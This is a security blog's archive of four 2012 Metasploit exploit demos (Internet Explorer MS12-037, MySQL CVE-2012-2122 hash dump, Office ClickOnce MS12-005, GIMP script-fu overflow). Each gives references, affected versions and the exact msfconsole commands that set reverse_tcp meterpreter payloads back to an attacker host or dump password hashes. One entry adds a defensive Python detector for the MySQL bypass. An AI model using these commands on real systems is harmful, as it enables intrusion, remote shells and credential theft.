Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

Timeline :

Vulnerability found being exploited in the wild
Public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-13

PoC provided by :

Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 on Windows XP SP3, using the same heap massaging plus heap spray technique as the exploit seen in the wild.

Commands :

use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-2122 Oracle MySQL Authentication Bypass Password Dump Metasploit Demo

Timeline :

Vulnerability discovered by Sergei Golubchik in April 2012
Bug reported to the vendor by Sergei Golubchik on 2012-04-06
Public release of the vulnerability on 2012-06-09
Metasploit PoC provided on 2012-06-11

PoC provided by :

Yorick Koster
jcran

Reference(s) :

CVE-2012-2122
Oracle MySQL BUG 64884
Oracle MySQL 5.1.63 Changes
Oracle MySQL 5.5.24 Changes

Affected version(s) :

Oracle MySQL versions up to and including 5.1.61 (on some platforms)
Oracle MySQL versions up to and including 5.5.24 (on some platforms)

Tested on Fedora release 16 (Verne) with :

5.5.23 MySQL Community Server

Description :

The targeted user account must be allowed to connect remotely, for example with a grant like:

grant all on *.* to root@'%' identified by 'password';

This module exploits an authentication (password check) bypass vulnerability in MySQL in order to extract the usernames and password hashes from a MySQL server. These hashes are stored as loot for later cracking.

Commands :

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.178.43
set USERNAME root
run
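What a defender can do with the pattern described above: the bypass only succeeds after many repeated wrong-password logins for one account (on affected platforms the faulty password comparison accepts a wrong password roughly once in a few hundred attempts), so a burst of "Access denied" connects followed by a successful connect for the same user@host is the signal to alert on. The script below is an added example, not code from the original post or from the Metasploit module; the log layout is modelled on the MySQL 5.5 general log and the sample lines are constructed, so both are assumptions.

```python
"""Detect a CVE-2012-2122-style authentication bypass from MySQL general-log lines.

Added example, not code from the original post or from the Metasploit module.
The bypass repeats a wrong-password login until the server's broken password
comparison happens to accept it, so the defender-side signal is a burst of
"Access denied" Connect entries for one user@host followed by a successful
Connect from the same pair. The log layout is modelled on the MySQL 5.5
general log and the sample lines are constructed; both are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# "120611 10:15:31\t   12 Connect\t<argument>"  (assumed general-log layout)
CONNECT_RE = re.compile(
    r"^(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2})\s+(?P<cid>\d+)\s+Connect\s+(?P<arg>.*)$")
DENIED_RE = re.compile(r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'")
OK_RE = re.compile(r"^(?P<user>[^@\s]+)@(?P<host>\S+) on\b")


def parse_connect(line):
    """Return (timestamp, user, host, succeeded) for a Connect line, else None."""
    m = CONNECT_RE.match(line)
    if not m:
        return None  # header lines, queries and other commands are ignored
    ts = datetime.strptime(m.group("ts"), "%y%m%d %H:%M:%S")
    arg = m.group("arg")
    d = DENIED_RE.search(arg)
    if d:
        return ts, d.group("user"), d.group("host"), False
    o = OK_RE.match(arg)
    if o:
        return ts, o.group("user"), o.group("host"), True
    return None


def find_bypass_attempts(lines, min_denied=32, window=timedelta(seconds=60)):
    """Flag a successful Connect preceded by >= min_denied denials for the same
    user@host inside `window`. A few mistyped passwords never reach the
    threshold; a bypass needs on the order of hundreds of attempts, so it does."""
    denials = defaultdict(deque)  # (user, host) -> timestamps of recent denials
    alerts = []
    for line in lines:
        ev = parse_connect(line)
        if ev is None:
            continue
        ts, user, host, ok = ev
        recent = denials[(user, host)]
        while recent and ts - recent[0] > window:
            recent.popleft()  # drop denials that fell out of the window
        if not ok:
            recent.append(ts)
        elif len(recent) >= min_denied:
            alerts.append({"user": user, "host": host, "time": ts, "denied": len(recent)})
            recent.clear()
    return alerts


def _entry(ts, cid, arg):
    """Format one constructed general-log Connect line."""
    return f"{ts:%y%m%d %H:%M:%S}\t{cid:5d} Connect\t{arg}"


def build_sample_log():
    """Constructed general-log excerpt: one normal login, a user mistyping a
    password three times, then a bypass-style burst of 100 denials in five
    seconds followed by a success for root@192.168.178.100 (all made up)."""
    t0 = datetime(2012, 6, 11, 10, 15, 0)
    lines = ["Time                 Id Command    Argument",
             _entry(t0, 10, "backup@192.168.178.5 on")]
    cid = 11
    for i in range(3):
        lines.append(_entry(t0 + timedelta(seconds=1 + i), cid,
                            "Access denied for user 'alice'@'192.168.178.7' (using password: YES)"))
        cid += 1
    lines.append(_entry(t0 + timedelta(seconds=5), cid, "alice@192.168.178.7 on"))
    cid += 1
    for i in range(100):
        lines.append(_entry(t0 + timedelta(seconds=10 + i // 20), cid,
                            "Access denied for user 'root'@'192.168.178.100' (using password: YES)"))
        cid += 1
    lines.append(_entry(t0 + timedelta(seconds=15), cid, "root@192.168.178.100 on"))
    return lines


if __name__ == "__main__":
    for a in find_bypass_attempts(build_sample_log()):
        print(f"{a['time']} possible auth bypass: {a['user']}@{a['host']} "
              f"succeeded after {a['denied']} denials")
```

The general log must be enabled for this to see anything (the error log only records denials, and only with log_warnings raised), and on the assumed layout the timestamp column is repeated on every line; adjust the regex if your server elides it for same-second entries. The threshold and window are tunable: the interesting property is the success right after the burst, not the burst alone, which is why a plain failed-login counter would also page on ordinary brute forcing.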

MS12-005 Microsoft Office ClickOnce Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Yorick Koster in June 2010
Coordinated public release of the vulnerability on 2012-01-10
Metasploit PoC provided on 2012-06-10

PoC provided by :

Yorick Koster
sinn3r

Reference(s) :

MS12-005
CVE-2012-0013
OSVDB-78207
BID-51284

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32 SP2
Windows Server 2008 x64 Service Pack 2
Windows 7 32
Windows 7 32 SP1
Windows 7 x64
Windows 7 x64 SP1
Windows Server 2008 R2 x64
Windows Server 2008 R2 x64 SP1

Tested on Windows XP Pro SP3 with :

Microsoft Office Word 2007 (12.0.4518.1014)

Description :

The target will need an installation of Ruby or Python in order to execute the payload. Macro execution in Word must also be allowed.

This module exploits a vulnerability found in Microsoft Office’s ClickOnce feature. When handling a macro document, the application fails to recognize certain file extensions as dangerous executables, which can be used to bypass the warning message. This allows you to trick your victim into opening the malicious document, which loads either a Python or Ruby payload, as chosen, and then finally downloads and executes our executable.

Commands :

use exploit/windows/fileformat/ms12_005
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

CVE-2012-2763 GIMP script-fu Server Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Joseph Sheridan on 2012-05-18
Public release of the vulnerability on 2012-05-19
Metasploit PoC provided on 2012-06-01

PoC provided by :

Joseph Sheridan
juan vazquez

Reference(s) :

CVE-2012-2763
OSVDB-82429
EDB-ID-18956
BID-53741

Affected version(s) :

All versions up to and including GIMP 2.6.12 (Windows or Linux builds)

Tested on Windows XP Pro SP3 with :

GIMP 2.6.10

Description :

This module exploits a buffer overflow in the script-fu server component of GIMP versions up to and including 2.6.12. By sending a specially crafted packet, an attacker may be able to achieve remote code execution in the context of the user running GIMP. This module has been tested on GIMP for Windows from the installers provided by Jernej Simoncic.

Commands :

use exploit/windows/misc/gimp_script_fu
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100

nmap -p 10008 192.168.178.22

exploit

getuid
sysinfo